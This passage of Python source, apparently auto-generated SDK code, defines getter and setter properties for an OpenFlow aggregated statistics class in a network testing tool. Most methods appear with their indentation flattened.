"PacketinReasonAction": "packetinReasonAction",
"PacketinReasonInvalidTTL": "packetinReasonInvalidTTL",
"PacketinReasonNoMatch": "packetinReasonNoMatch",
"PortDescRepliesRx": "portDescRepliesRx",
"PortDescRequestsTx": "portDescRequestsTx",
"PortModErrorsRx": "portModErrorsRx",
"PortModsTx": "portModsTx",
"PortName": "portName",
"PortStatRepliesRx": "portStatRepliesRx",
"PortStatRequestsTx": "portStatRequestsTx",
"PortStatusesRx": "portStatusesRx",
"QueueOpErrorsRx": "queueOpErrorsRx",
"QueueStatRepliesRx": "queueStatRepliesRx",
"QueueStatRequestsTx": "queueStatRequestsTx",
"RequestErrorsRx": "requestErrorsRx",
"RoleRepliesRx": "roleRepliesRx",
"RoleRequestErrorsRx": "roleRequestErrorsRx",
"RoleRequestsTx": "roleRequestsTx",
"SetAsynchronousConfigTx": "setAsynchronousConfigTx",
"SetConfigTx": "setConfigTx",
"StatRepliesRx": "statRepliesRx",
"StatRequestsTx": "statRequestsTx",
"SwitchConfigErrorsRx": "switchConfigErrorsRx",
"TableFeatureErrorsRx": "tableFeatureErrorsRx",
"TableFeatureRepliesRx": "tableFeatureRepliesRx",
"TableFeatureRequestsTx": "tableFeatureRequestsTx",
"TableModErrorsRx": "tableModErrorsRx",
"TableModsTx": "tableModsTx",
"TableStatRepliesRx": "tableStatRepliesRx",
"TableStatRequestsTx": "tableStatRequestsTx",
"VendorMessagesRx": "vendorMessagesRx",
"VendorMessagesTx": "vendorMessagesTx",
"VendorStatRepliesRx": "vendorStatRepliesRx",
"VendorStatRequestsTx": "vendorStatRequestsTx",
}
_SDM_ENUM_MAP = {}
def __init__(self, parent, list_op=False):
    """Initialize the statistics resource node.

    Args:
        parent: the parent node this resource hangs off.
        list_op (bool): presumably marks participation in a list operation;
            forwarded unchanged to Base -- confirm against Base.__init__.
    """
    super(OpenflowAggregatedStatistics, self).__init__(parent, list_op)
@property
def ActionErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Action Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["ActionErrorsRx"])
@ActionErrorsRx.setter
def ActionErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["ActionErrorsRx"], value)
@property
def AuxiliaryConnectionsUp(self):
# type: () -> bool
"""
Returns
-------
- bool: Auxiliary Connections Up
"""
return self._get_attribute(self._SDM_ATT_MAP["AuxiliaryConnectionsUp"])
@AuxiliaryConnectionsUp.setter
def AuxiliaryConnectionsUp(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["AuxiliaryConnectionsUp"], value)
@property
def BarrierRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Barrier Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["BarrierRepliesRx"])
@BarrierRepliesRx.setter
def BarrierRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["BarrierRepliesRx"], value)
@property
def BarrierRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Barrier Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["BarrierRequestsTx"])
@BarrierRequestsTx.setter
def BarrierRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["BarrierRequestsTx"], value)
@property
def DescriptionStatRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Description Stat Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["DescriptionStatRepliesRx"])
@DescriptionStatRepliesRx.setter
def DescriptionStatRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["DescriptionStatRepliesRx"], value)
@property
def DescriptionStatRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Description Stat Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["DescriptionStatRequestsTx"])
@DescriptionStatRequestsTx.setter
def DescriptionStatRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["DescriptionStatRequestsTx"], value)
@property
def EchoRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Echo Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["EchoRepliesRx"])
@EchoRepliesRx.setter
def EchoRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["EchoRepliesRx"], value)
@property
def EchoRepliesTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Echo Replies Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["EchoRepliesTx"])
@EchoRepliesTx.setter
def EchoRepliesTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["EchoRepliesTx"], value)
@property
def EchoRequestsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Echo Requests Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["EchoRequestsRx"])
@EchoRequestsRx.setter
def EchoRequestsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["EchoRequestsRx"], value)
@property
def EchoRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Echo Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["EchoRequestsTx"])
@EchoRequestsTx.setter
def EchoRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["EchoRequestsTx"], value)
@property
def ErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["ErrorsRx"])
@ErrorsRx.setter
def ErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["ErrorsRx"], value)
@property
def ExperimenterErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Experimenter Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["ExperimenterErrorsRx"])
@ExperimenterErrorsRx.setter
def ExperimenterErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["ExperimenterErrorsRx"], value)
@property
def FeatureRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Feature Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["FeatureRepliesRx"])
@FeatureRepliesRx.setter
def FeatureRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FeatureRepliesRx"], value)
@property
def FeatureRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Feature Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["FeatureRequestsTx"])
@FeatureRequestsTx.setter
def FeatureRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FeatureRequestsTx"], value)
@property
def FlowAddsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Flow Adds Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["FlowAddsTx"])
@FlowAddsTx.setter
def FlowAddsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FlowAddsTx"], value)
@property
def FlowAggregateStatRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Flow Aggregate Stat Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["FlowAggregateStatRepliesRx"])
@FlowAggregateStatRepliesRx.setter
def FlowAggregateStatRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FlowAggregateStatRepliesRx"], value)
@property
def FlowAggregateStatRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Flow Aggregate Stat Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["FlowAggregateStatRequestsTx"])
@FlowAggregateStatRequestsTx.setter
def FlowAggregateStatRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FlowAggregateStatRequestsTx"], value)
@property
def FlowDelsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Flow Dels Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["FlowDelsTx"])
@FlowDelsTx.setter
def FlowDelsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FlowDelsTx"], value)
@property
def FlowModErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Flow Mod Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["FlowModErrorsRx"])
@FlowModErrorsRx.setter
def FlowModErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FlowModErrorsRx"], value)
@property
def FlowModsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Flow Mods Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["FlowModsTx"])
@FlowModsTx.setter
def FlowModsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FlowModsTx"], value)
@property
def FlowRateflowssec(self):
# type: () -> bool
"""
Returns
-------
- bool: Flow Rate (flows/sec)
"""
return self._get_attribute(self._SDM_ATT_MAP["FlowRateflowssec"])
@FlowRateflowssec.setter
def FlowRateflowssec(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FlowRateflowssec"], value)
@property
def FlowRemovesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Flow Removes Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["FlowRemovesRx"])
@FlowRemovesRx.setter
def FlowRemovesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FlowRemovesRx"], value)
@property
def FlowStatRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Flow Stat Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["FlowStatRepliesRx"])
@FlowStatRepliesRx.setter
def FlowStatRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FlowStatRepliesRx"], value)
@property
def FlowStatRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Flow Stat Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["FlowStatRequestsTx"])
@FlowStatRequestsTx.setter
def FlowStatRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["FlowStatRequestsTx"], value)
@property
def GetAsynchronousConfigRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Get Asynchronous Config Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["GetAsynchronousConfigRepliesRx"])
@GetAsynchronousConfigRepliesRx.setter
def GetAsynchronousConfigRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GetAsynchronousConfigRepliesRx"], value)
@property
def GetAsynchronousConfigRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Get Asynchronous Config Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["GetAsynchronousConfigRequestsTx"])
@GetAsynchronousConfigRequestsTx.setter
def GetAsynchronousConfigRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GetAsynchronousConfigRequestsTx"], value)
@property
def GetConfigRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Get Config Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["GetConfigRepliesRx"])
@GetConfigRepliesRx.setter
def GetConfigRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GetConfigRepliesRx"], value)
@property
def GetConfigRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Get Config Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["GetConfigRequestsTx"])
@GetConfigRequestsTx.setter
def GetConfigRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GetConfigRequestsTx"], value)
@property
def GetQueueConfigRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Get Queue Config Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["GetQueueConfigRepliesRx"])
@GetQueueConfigRepliesRx.setter
def GetQueueConfigRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GetQueueConfigRepliesRx"], value)
@property
def GetQueueConfigRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Get Queue Config Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["GetQueueConfigRequestsTx"])
@GetQueueConfigRequestsTx.setter
def GetQueueConfigRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GetQueueConfigRequestsTx"], value)
@property
def GroupAddsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Group Adds Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["GroupAddsTx"])
@GroupAddsTx.setter
def GroupAddsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GroupAddsTx"], value)
@property
def GroupDelsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Group Dels Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["GroupDelsTx"])
@GroupDelsTx.setter
def GroupDelsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GroupDelsTx"], value)
@property
def GroupDescRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Group Desc Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["GroupDescRepliesRx"])
@GroupDescRepliesRx.setter
def GroupDescRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GroupDescRepliesRx"], value)
@property
def GroupDescRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Group Desc Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["GroupDescRequestsTx"])
@GroupDescRequestsTx.setter
def GroupDescRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GroupDescRequestsTx"], value)
@property
def GroupFeatureRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Group Feature Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["GroupFeatureRepliesRx"])
@GroupFeatureRepliesRx.setter
def GroupFeatureRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GroupFeatureRepliesRx"], value)
@property
def GroupFeatureRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Group Feature Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["GroupFeatureRequestsTx"])
@GroupFeatureRequestsTx.setter
def GroupFeatureRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GroupFeatureRequestsTx"], value)
@property
def GroupModErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Group Mod Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["GroupModErrorsRx"])
@GroupModErrorsRx.setter
def GroupModErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GroupModErrorsRx"], value)
@property
def GroupModsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Group Mods Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["GroupModsTx"])
@GroupModsTx.setter
def GroupModsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GroupModsTx"], value)
@property
def GroupStatRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Group Stat Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["GroupStatRepliesRx"])
@GroupStatRepliesRx.setter
def GroupStatRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GroupStatRepliesRx"], value)
@property
def GroupStatRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Group Stat Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["GroupStatRequestsTx"])
@GroupStatRequestsTx.setter
def GroupStatRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["GroupStatRequestsTx"], value)
@property
def HelloErrorsRx(self):
    # type: () -> bool
    """
    Returns
    -------
    - bool: Hello Errors Rx
    """
    attr_key = self._SDM_ATT_MAP["HelloErrorsRx"]
    return self._get_attribute(attr_key)
@HelloErrorsRx.setter
def HelloErrorsRx(self, value):
    # type: (bool) -> None
    """Sets the bool 'HelloErrorsRx' attribute."""
    attr_key = self._SDM_ATT_MAP["HelloErrorsRx"]
    self._set_attribute(attr_key, value)
@property
def HellosRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Hellos Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["HellosRx"])
@HellosRx.setter
def HellosRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["HellosRx"], value)
@property
def HellosTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Hellos Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["HellosTx"])
@HellosTx.setter
def HellosTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["HellosTx"], value)
@property
def InstructionErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Instruction Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["InstructionErrorsRx"])
@InstructionErrorsRx.setter
def InstructionErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["InstructionErrorsRx"], value)
@property
def MatchErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Match Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["MatchErrorsRx"])
@MatchErrorsRx.setter
def MatchErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["MatchErrorsRx"], value)
@property
def MeterAddsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Meter Adds Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["MeterAddsTx"])
@MeterAddsTx.setter
def MeterAddsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["MeterAddsTx"], value)
@property
def MeterConfigRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Meter Config Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["MeterConfigRepliesRx"])
@MeterConfigRepliesRx.setter
def MeterConfigRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["MeterConfigRepliesRx"], value)
@property
def MeterConfigRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Meter Config Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["MeterConfigRequestsTx"])
@MeterConfigRequestsTx.setter
def MeterConfigRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["MeterConfigRequestsTx"], value)
@property
def MeterDelsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Meter Dels Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["MeterDelsTx"])
@MeterDelsTx.setter
def MeterDelsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["MeterDelsTx"], value)
@property
def MeterFeatureRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Meter Feature Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["MeterFeatureRepliesRx"])
@MeterFeatureRepliesRx.setter
def MeterFeatureRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["MeterFeatureRepliesRx"], value)
@property
def MeterFeatureRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Meter Feature Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["MeterFeatureRequestsTx"])
@MeterFeatureRequestsTx.setter
def MeterFeatureRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["MeterFeatureRequestsTx"], value)
@property
def MeterModErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Meter Mod Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["MeterModErrorsRx"])
@MeterModErrorsRx.setter
def MeterModErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["MeterModErrorsRx"], value)
@property
def MeterModsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Meter Mods Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["MeterModsTx"])
@MeterModsTx.setter
def MeterModsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["MeterModsTx"], value)
@property
def MeterStatRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Meter Stat Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["MeterStatRepliesRx"])
@MeterStatRepliesRx.setter
def MeterStatRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["MeterStatRepliesRx"], value)
@property
def MeterStatRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Meter Stat Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["MeterStatRequestsTx"])
@MeterStatRequestsTx.setter
def MeterStatRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["MeterStatRequestsTx"], value)
@property
def OfChannelConfigured(self):
# type: () -> bool
"""
Returns
-------
- bool: OF Channel Configured
"""
return self._get_attribute(self._SDM_ATT_MAP["OfChannelConfigured"])
@OfChannelConfigured.setter
def OfChannelConfigured(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["OfChannelConfigured"], value)
@property
def OfChannelConfiguredUp(self):
# type: () -> bool
"""
Returns
-------
- bool: OF Channel Configured Up
"""
return self._get_attribute(self._SDM_ATT_MAP["OfChannelConfiguredUp"])
@OfChannelConfiguredUp.setter
def OfChannelConfiguredUp(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["OfChannelConfiguredUp"], value)
@property
def OfChannelFlapCount(self):
    # type: () -> bool
    """
    Returns
    -------
    - bool: OF Channel Flap Count
    """
    attr_key = self._SDM_ATT_MAP["OfChannelFlapCount"]
    return self._get_attribute(attr_key)
@OfChannelFlapCount.setter
def OfChannelFlapCount(self, value):
    # type: (bool) -> None
    """Sets the bool 'OfChannelFlapCount' attribute."""
    attr_key = self._SDM_ATT_MAP["OfChannelFlapCount"]
    self._set_attribute(attr_key, value)
@property
def OfChannelLearnedUp(self):
# type: () -> bool
"""
Returns
-------
- bool: OF Channel Learned Up
"""
return self._get_attribute(self._SDM_ATT_MAP["OfChannelLearnedUp"])
@OfChannelLearnedUp.setter
def OfChannelLearnedUp(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["OfChannelLearnedUp"], value)
@property
def PacketInsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Packet Ins Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["PacketInsRx"])
@PacketInsRx.setter
def PacketInsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PacketInsRx"], value)
@property
def PacketOutsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Packet Outs Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["PacketOutsTx"])
@PacketOutsTx.setter
def PacketOutsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PacketOutsTx"], value)
@property
def PacketinReasonAction(self):
# type: () -> bool
"""
Returns
-------
- bool: PacketIn Reason Action
"""
return self._get_attribute(self._SDM_ATT_MAP["PacketinReasonAction"])
@PacketinReasonAction.setter
def PacketinReasonAction(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PacketinReasonAction"], value)
@property
def PacketinReasonInvalidTTL(self):
# type: () -> bool
"""
Returns
-------
- bool: PacketIn Reason Invalid TTL
"""
return self._get_attribute(self._SDM_ATT_MAP["PacketinReasonInvalidTTL"])
@PacketinReasonInvalidTTL.setter
def PacketinReasonInvalidTTL(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PacketinReasonInvalidTTL"], value)
@property
def PacketinReasonNoMatch(self):
# type: () -> bool
"""
Returns
-------
- bool: PacketIn Reason No Match
"""
return self._get_attribute(self._SDM_ATT_MAP["PacketinReasonNoMatch"])
@PacketinReasonNoMatch.setter
def PacketinReasonNoMatch(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PacketinReasonNoMatch"], value)
@property
def PortDescRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Port Desc Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["PortDescRepliesRx"])
@PortDescRepliesRx.setter
def PortDescRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PortDescRepliesRx"], value)
@property
def PortDescRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Port Desc Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["PortDescRequestsTx"])
@PortDescRequestsTx.setter
def PortDescRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PortDescRequestsTx"], value)
@property
def PortModErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Port Mod Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["PortModErrorsRx"])
@PortModErrorsRx.setter
def PortModErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PortModErrorsRx"], value)
@property
def PortModsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Port Mods Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["PortModsTx"])
@PortModsTx.setter
def PortModsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PortModsTx"], value)
@property
def PortName(self):
    # type: () -> bool
    """
    Returns
    -------
    - bool: Port Name
    """
    attr_key = self._SDM_ATT_MAP["PortName"]
    return self._get_attribute(attr_key)
@PortName.setter
def PortName(self, value):
    # type: (bool) -> None
    """Sets the bool 'PortName' attribute."""
    attr_key = self._SDM_ATT_MAP["PortName"]
    self._set_attribute(attr_key, value)
@property
def PortStatRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Port Stat Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["PortStatRepliesRx"])
@PortStatRepliesRx.setter
def PortStatRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PortStatRepliesRx"], value)
@property
def PortStatRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Port Stat Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["PortStatRequestsTx"])
@PortStatRequestsTx.setter
def PortStatRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PortStatRequestsTx"], value)
@property
def PortStatusesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Port Statuses Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["PortStatusesRx"])
@PortStatusesRx.setter
def PortStatusesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["PortStatusesRx"], value)
@property
def QueueOpErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Queue Op Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["QueueOpErrorsRx"])
@QueueOpErrorsRx.setter
def QueueOpErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["QueueOpErrorsRx"], value)
@property
def QueueStatRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Queue Stat Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["QueueStatRepliesRx"])
@QueueStatRepliesRx.setter
def QueueStatRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["QueueStatRepliesRx"], value)
@property
def QueueStatRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Queue Stat Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["QueueStatRequestsTx"])
@QueueStatRequestsTx.setter
def QueueStatRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["QueueStatRequestsTx"], value)
@property
def RequestErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Request Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["RequestErrorsRx"])
@RequestErrorsRx.setter
def RequestErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["RequestErrorsRx"], value)
@property
def RoleRepliesRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Role Replies Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["RoleRepliesRx"])
@RoleRepliesRx.setter
def RoleRepliesRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["RoleRepliesRx"], value)
@property
def RoleRequestErrorsRx(self):
# type: () -> bool
"""
Returns
-------
- bool: Role Request Errors Rx
"""
return self._get_attribute(self._SDM_ATT_MAP["RoleRequestErrorsRx"])
@RoleRequestErrorsRx.setter
def RoleRequestErrorsRx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["RoleRequestErrorsRx"], value)
@property
def RoleRequestsTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Role Requests Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["RoleRequestsTx"])
@RoleRequestsTx.setter
def RoleRequestsTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["RoleRequestsTx"], value)
@property
def SetAsynchronousConfigTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Set Asynchronous Config Tx
"""
return self._get_attribute(self._SDM_ATT_MAP["SetAsynchronousConfigTx"])
@SetAsynchronousConfigTx.setter
def SetAsynchronousConfigTx(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["SetAsynchronousConfigTx"], value)
@property
def SetConfigTx(self):
# type: () -> bool
"""
Returns
-------
- bool: Set Config Tx
"""
